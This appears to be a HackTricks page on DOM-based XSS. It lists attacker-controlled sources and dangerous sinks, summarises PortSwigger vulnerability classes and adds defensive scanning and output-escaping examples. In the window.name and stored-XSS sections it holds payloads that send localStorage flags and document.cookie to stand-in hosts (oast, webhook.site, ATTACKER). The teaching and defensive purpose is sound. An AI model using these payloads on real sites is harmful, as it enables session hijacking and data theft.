DOM XSS
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
DOM vulnerabilities
DOM vulnerabilities occur when data from attacker-controlled sources (such as location.search, document.referrer, or document.cookie) is passed insecurely to sinks. Sinks are functions or objects (e.g., eval(), document.body.innerHTML) that can execute or render harmful content if they are given malicious data.
- Sources are inputs that can be manipulated by attackers, including URLs, cookies, and web messages.
- Sinks are potentially dangerous endpoints where malicious data can cause harm, such as script execution.
The risk arises when data flows from sources to sinks without proper validation or sanitization, enabling attacks like XSS.
Tip
You can find a more up-to-date list of sources and sinks at https://github.com/wisec/domxsswiki/wiki
Common sources:
document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location
document.cookie
document.referrer
window.name
history.pushState
history.replaceState
localStorage
sessionStorage
IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)
Database
Common sinks:
| Open Redirect | Javascript Injection | DOM-data manipulation | jQuery |
|---|---|---|---|
| location | eval() | scriptElement.src | add() |
| location.host | Function() constructor | scriptElement.text | after() |
| location.hostname | setTimeout() | scriptElement.textContent | append() |
| location.href | setInterval() | scriptElement.innerText | animate() |
| location.pathname | setImmediate() | someDOMElement.setAttribute() | insertAfter() |
| location.search | execCommand() | someDOMElement.search | insertBefore() |
| location.protocol | execScript() | someDOMElement.text | before() |
| location.assign() | msSetImmediate() | someDOMElement.textContent | html() |
| location.replace() | range.createContextualFragment() | someDOMElement.innerText | prepend() |
| open() | crypto.generateCRMFRequest() | someDOMElement.outerText | replaceAll() |
| domElem.srcdoc | **Local file-path manipulation** | someDOMElement.value | replaceWith() |
| XMLHttpRequest.open() | FileReader.readAsArrayBuffer() | someDOMElement.name | wrap() |
| XMLHttpRequest.send() | FileReader.readAsBinaryString() | someDOMElement.target | wrapInner() |
| jQuery.ajax() | FileReader.readAsDataURL() | someDOMElement.method | wrapAll() |
| $.ajax() | FileReader.readAsText() | someDOMElement.type | has() |
| **Ajax request manipulation** | FileReader.readAsFile() | someDOMElement.backgroundImage | constructor() |
| XMLHttpRequest.setRequestHeader() | FileReader.root.getFile() | someDOMElement.cssText | init() |
| XMLHttpRequest.open() | FileReader.root.getFile() | someDOMElement.codebase | index() |
| XMLHttpRequest.send() | **Link manipulation** | someDOMElement.innerHTML | jQuery.parseHTML() |
| jQuery.globalEval() | someDOMElement.href | someDOMElement.outerHTML | $.parseHTML() |
| $.globalEval() | someDOMElement.src | someDOMElement.insertAdjacentHTML | **Client-side JSON injection** |
| **HTML5-storage manipulation** | someDOMElement.action | someDOMElement.onevent | JSON.parse() |
| sessionStorage.setItem() | **XPath injection** | document.write() | jQuery.parseJSON() |
| localStorage.setItem() | document.evaluate() | document.writeln() | $.parseJSON() |
| **[Denial of Service](dom-xss.md#denial-of-service)** | someDOMElement.evaluate() | document.title | **Cookie manipulation** |
| requestFileSystem() | **Document-domain manipulation** | document.implementation.createHTMLDocument() | document.cookie |
| RegExp() | document.domain | history.pushState() | **WebSocket-URL poisoning** |
| **Client-Side SQL injection** | **Web-message manipulation** | history.replaceState() | WebSocket |
| executeSql() | postMessage() | | |
The innerHTML sink does not accept script elements in any modern browser, and svg onload events will not fire either. This means you will need to use alternative elements such as img or iframe.
This type of XSS is probably the hardest to find, because you need to read the JS code, see whether it uses any object whose value you control, and in that case see whether there is any way to abuse it to execute arbitrary JS.
Tools to find them
- https://github.com/mozilla/eslint-plugin-no-unsanitized
- Browser extension to inspect every piece of data that reaches a potentially exploitable sink: https://github.com/kevin-mizu/domloggerpp
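As an added example, not code from HackTricks or from either tool above, a grep-style triage heuristic that flags statements in which a source from the list above flows into a sink; `SOURCES`, `SINKS`, `findFlows` and the sample code lines are constructed here.

```javascript
// Added example, not HackTricks or domloggerpp code: a grep-style triage
// heuristic that flags statements where a DOM XSS *source* from the list above
// flows into a *sink*. It inspects one line at a time, so it cannot follow data
// through variables; it is a first pass for code review, not a taint tracker.
const SOURCES = [
  "location.hash", "location.search", "location.href", "document.URL",
  "document.referrer", "document.cookie", "window.name", "document.baseURI",
  "localStorage.getItem", "sessionStorage.getItem",
];
// Sinks spelled as they appear in code (property name or call with open paren).
const SINKS = [
  "innerHTML", "outerHTML", "insertAdjacentHTML", "document.write",
  "eval(", "setTimeout(", "setInterval(", "Function(", ".html(",
  "location.href", "location.assign(", "location.replace(",
];

// Earliest occurrence of any needle in `line` after `minIndex`, or null.
function firstMatch(line, needles, minIndex = -1) {
  return needles
    .map((name) => ({ name, at: line.indexOf(name) }))
    .filter((m) => m.at > minIndex)
    .sort((a, b) => a.at - b.at)[0] || null;
}

// A line is flagged when a sink appears and a source appears *after* it, i.e.
// the source sits on the receiving side of the assignment or call argument.
function findFlows(jsSource) {
  const findings = [];
  jsSource.split("\n").forEach((line, i) => {
    const sink = firstMatch(line, SINKS);
    if (!sink) return;
    const src = firstMatch(line, SOURCES, sink.at);
    if (src) findings.push({ line: i + 1, sink: sink.name, source: src.name });
  });
  return findings;
}

// Constructed sample code: lines 3, 4 and 5 are real source-to-sink flows.
const SAMPLE = [
  'const q = new URLSearchParams(location.search).get("q");',
  "results.textContent = location.hash.slice(1);", // text sink, not flagged
  'results.innerHTML = "Results for " + location.search;',
  "location.href = location.hash.slice(1);",
  "setTimeout(window.name, 0);",
  'eval("1+1");', // sink with constant input, not flagged
].join("\n");
```

Every hit still needs manual confirmation in the browser (for example with domloggerpp), since the heuristic neither sees sanitization applied elsewhere nor flows that span several statements.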
Examples
Open Redirect
From: https://portswigger.net/web-security/dom-based/open-redirection
Open redirect vulnerabilities in the DOM occur when a script writes data that an attacker can control into a sink capable of initiating a redirect to another domain.
It is crucial to understand that executing arbitrary code, such as javascript:alert(1), is possible if you control the beginning of the URL to which the redirect happens.
Sinki:
location
location.host
location.hostname
location.href
location.pathname
location.search
location.protocol
location.assign()
location.replace()
open()
domElem.srcdoc
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.ajax()
$.ajax()
Cookie manipulation
From: https://portswigger.net/web-security/dom-based/cookie-manipulation
DOM-based cookie-manipulation vulnerabilities occur when a script incorporates data that an attacker can control into the value of a cookie. This can lead to unexpected behaviour of the web page if the cookie is used within the site. It can also be exploited to carry out a session fixation attack if the cookie is involved in tracking user sessions. The main sink associated with this vulnerability is:
Sinks:
document.cookie
JavaScript Injection
From: https://portswigger.net/web-security/dom-based/javascript-injection
DOM-based JavaScript injection vulnerabilities occur when a script executes data that an attacker can control as JavaScript code.
Sinks:
eval()
Function() constructor
setTimeout()
setInterval()
setImmediate()
execCommand()
execScript()
msSetImmediate()
range.createContextualFragment()
crypto.generateCRMFRequest()
Document-domain manipulation
From: https://portswigger.net/web-security/dom-based/document-domain-manipulation
Document-domain manipulation vulnerabilities occur when a script sets the document.domain property using data that an attacker can control.
The document.domain property plays a key role in how browsers enforce the same-origin policy. When two pages from different origins set document.domain to the same value, they can interact without restrictions. Although browsers impose certain limits on the values that can be assigned to document.domain, preventing the assignment of values completely unrelated to the page's actual origin, exceptions exist. Typically, browsers allow the use of child or parent domains.
Sinks:
document.domain
WebSocket-URL poisoning
From: https://portswigger.net/web-security/dom-based/websocket-url-poisoning
WebSocket-URL poisoning occurs when a script uses controllable data as the target URL for a WebSocket connection.
Sinks:
The WebSocket constructor can lead to WebSocket-URL poisoning vulnerabilities.
Link manipulation
From: https://portswigger.net/web-security/dom-based/link-manipulation
DOM-based link-manipulation vulnerabilities arise when a script writes attacker-controllable data to a navigation target within the current page, such as a clickable link or the submission URL of a form.
Sinks:
someDOMElement.href
someDOMElement.src
someDOMElement.action
Ajax request manipulation
From: https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation
Ajax request manipulation vulnerabilities occur when a script writes attacker-controllable data into an Ajax request that is issued using an XmlHttpRequest object.
Sinks:
XMLHttpRequest.setRequestHeader()
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.globalEval()
$.globalEval()
Local file-path manipulation
From: https://portswigger.net/web-security/dom-based/local-file-path-manipulation
Local file-path manipulation vulnerabilities arise when a script passes attacker-controllable data to a file-handling API as the filename parameter. An attacker could exploit this to construct a URL that, if visited by another user, causes the user's browser to open or write an arbitrary local file.
Sinks:
FileReader.readAsArrayBuffer()
FileReader.readAsBinaryString()
FileReader.readAsDataURL()
FileReader.readAsText()
FileReader.readAsFile()
FileReader.root.getFile()
FileReader.root.getFile()
Client-Side SQL injection
From: https://portswigger.net/web-security/dom-based/client-side-sql-injection
Client-side SQL-injection vulnerabilities occur when a script incorporates attacker-controllable data into a client-side SQL query in an unsafe way.
Sinks:
executeSql()
HTML5-storage manipulation
From: https://portswigger.net/web-security/dom-based/html5-storage-manipulation
HTML5-storage manipulation vulnerabilities arise when a script stores attacker-controllable data in the web browser's HTML5 storage (localStorage or sessionStorage). While this action is not inherently a security vulnerability, it becomes a problem if the application later reads the stored data and processes it in an unsafe way. This can allow an attacker to use the storage mechanism to carry out other DOM-based attacks, such as cross-site scripting and JavaScript injection.
Sinks:
sessionStorage.setItem()
localStorage.setItem()
XPath injection
From: https://portswigger.net/web-security/dom-based/client-side-xpath-injection
DOM-based XPath-injection vulnerabilities occur when a script incorporates attacker-controllable data into an XPath query.
Sinks:
document.evaluate()
someDOMElement.evaluate()
Client-side JSON injection
From: https://portswigger.net/web-security/dom-based/client-side-json-injection
DOM-based JSON-injection vulnerabilities arise when a script incorporates attacker-controllable data into a string that is parsed as a JSON data structure and then processed by the application.
Sinks:
JSON.parse()
jQuery.parseJSON()
$.parseJSON()
Web-message manipulation
From: https://portswigger.net/web-security/dom-based/web-message-manipulation
Web-message vulnerabilities arise when a script sends attacker-controllable data as a web message to another document within the browser. An example of vulnerable Web-message manipulation can be found on PortSwigger's Web Security Academy.
Sinks:
The postMessage() method for sending web messages can lead to vulnerabilities if the event listener for receiving messages handles the incoming data in an unsafe way.
DOM-data manipulation
From: https://portswigger.net/web-security/dom-based/dom-data-manipulation
DOM-data manipulation vulnerabilities arise when a script writes attacker-controllable data to a field within the DOM that is used in the visible UI or in client-side logic. An attacker could exploit this to construct a URL that, if visited by another user, alters the appearance or behaviour of the client-side UI.
Sinks:
scriptElement.src
scriptElement.text
scriptElement.textContent
scriptElement.innerText
someDOMElement.setAttribute()
someDOMElement.search
someDOMElement.text
someDOMElement.textContent
someDOMElement.innerText
someDOMElement.outerText
someDOMElement.value
someDOMElement.name
someDOMElement.target
someDOMElement.method
someDOMElement.type
someDOMElement.backgroundImage
someDOMElement.cssText
someDOMElement.codebase
document.title
document.implementation.createHTMLDocument()
history.pushState()
history.replaceState()
Denial of Service
From: https://portswigger.net/web-security/dom-based/denial-of-service
DOM-based denial-of-service vulnerabilities occur when a script passes attacker-controllable data unsafely to a problematic platform API. This includes APIs that, when invoked, can cause the user's computer to consume excessive amounts of CPU or disk space. Such vulnerabilities can have serious side effects, such as the browser restricting the website's functionality by refusing attempts to store data in localStorage or terminating busy scripts.
Sinks:
requestFileSystem()
RegExp()
DOM Clobbering
Implicit globals & window.name abuse
Referencing name without declaring it (var/let/const) resolves to window.name. Because window.name persists across cross-origin navigations, an attacker can pre-seed the browsing context's name with HTML/JS, and the victim's code later consumes it as trusted data:
- Open/navigate the target in a named context you control:

```html
<iframe name="<img src=x onerror=fetch('https://oast/?f='+btoa(localStorage.flag))>" src="https://target/page"></iframe>
```

- Or reuse window.open with a crafted target name:

```javascript
window.open('https://target/page', "<svg/onload=alert(document.domain)>")
```

If the application later does element.innerHTML = name (or a similar sink) without sanitizing, the attacker-controlled window.name string executes in the target origin, enabling DOM XSS and access to same-origin storage.
Admin/automation flows: pre-seeded storage & javascript: navigation
Automation bots (e.g., Playwright) often first visit an internal page, set a secret in localStorage/cookies, and then navigate to user-supplied URLs. Any DOM XSS primitive (including window.name abuse) in that flow can exfiltrate the seeded secret:

```javascript
fetch('https://webhook.site/<id>?flag=' + encodeURIComponent(localStorage.getItem('flag')))
```

If the bot does not block schemes, supplying a javascript: URL (javascript:fetch(...)) executes in the current origin without a new navigation, leaking the storage values.
Template literal innerHTML + partial sanitization gap
Frontends that sanitize only selected fields but still interpolate an untrusted one directly into innerHTML are trivially exploitable. Example:

```javascript
// Fetches the admin's bug-report list and renders each report into a card.
// `reportCard` is the container element for the report (created elsewhere).
fetch(`${window.location.origin}/admin/bug_reports`).then(r => r.json()).then(reports => {
  reports.forEach(report => {
    reportCard.innerHTML = `
      <div>${DOMPurify.sanitize(report.id)}</div>
      <div>${report.details}</div> <!-- unsanitized sink: report.details reaches innerHTML raw -->
    `;
  });
});
```

If the unsanitized field is stored server-side (e.g., a bug report "details"), the payload becomes stored DOM XSS for any viewer allowed to see the list. A simple payload such as <img src=x onerror=fetch('http://ATTACKER/?c='+document.cookie)> executes when the admin opens the page and sends their cookies.
When the app explicitly disables SESSION_COOKIE_HTTPONLY (e.g., Flask app.config['SESSION_COOKIE_HTTPONLY'] = False), the stolen cookie immediately grants the admin session even if the signing secret rotates on every restart (a random secret_key prevents forging, but theft still works).
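As an added example, not code from this page or from the referenced HTB/Flagvent write-ups, the report-card template above next to a hardened version that escapes every interpolated field; `REPORT`, `sanitizeLikeDomPurify` and the render helpers are constructed stand-ins, and the DOM is modelled as the HTML string that would be assigned to innerHTML so the code runs under Node.

```javascript
// Added example, not code from the page or from the referenced write-ups. The DOM
// is modelled as the HTML string that would be assigned to innerHTML so this runs
// under Node; in a browser, prefer createElement + textContent over templates.

// Constructed report as the server would return it, carrying the page's payload
// in the one field the original template interpolates without sanitizing.
const REPORT = {
  id: "42",
  details: "<img src=x onerror=fetch('http://ATTACKER/?c='+document.cookie)>",
};

// Stand-in for DOMPurify.sanitize on a plain id: strips tags, keeps text. The bug
// is not what it does but that it is applied to only one of the two fields.
const sanitizeLikeDomPurify = (s) => String(s).replace(/<[^>]*>/g, "");

// Vulnerable: mirrors the original snippet; `details` reaches the sink raw.
function renderVulnerable(report) {
  return `<div>${sanitizeLikeDomPurify(report.id)}</div>` +
         `<div>${report.details}</div>`;
}

// Escape for HTML *element content*. Attribute, URL and script contexts need
// their own encoders; a single escaper is not a universal fix.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: every interpolated value is escaped, so markup in any field is inert.
function renderHardened(report) {
  return `<div>${escapeHtml(report.id)}</div>` +
         `<div>${escapeHtml(report.details)}</div>`;
}

// Review/detection aid: does the produced markup still carry an inline event
// handler attribute (onerror=, onload=, ...) inside a real tag?
function containsEventHandler(html) {
  return /<[^>]*\son\w+\s*=/i.test(html);
}
```

Escaping removes the execution sink; keeping session cookies HttpOnly (the Flask default) is a separate control that limits what any surviving XSS can read.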
References
- Flagvent 2025 (Medium) — pink, Santa’s Wishlist, Christmas Metadata, Captured Noise
- HTB: Imagery (stored DOM XSS via partial DOMPurify + session theft)